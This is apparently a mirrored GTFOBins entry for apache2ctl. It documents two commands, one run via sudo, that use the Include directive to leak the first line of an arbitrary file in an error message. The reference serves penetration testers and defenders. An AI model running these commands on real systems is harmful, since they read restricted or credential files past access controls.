1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00
GTFOBins.github.io/_gtfobins/apache2ctl.md
2023-12-23 12:13:45 +01:00

337 B

description functions
This includes the file in the actual configuration file, the first line is leaked as an error message.
file-read sudo
code
LFILE=file_to_read apache2ctl -c "Include $LFILE" -k stop
code
LFILE=file_to_read sudo apache2ctl -c "Include $LFILE" -k stop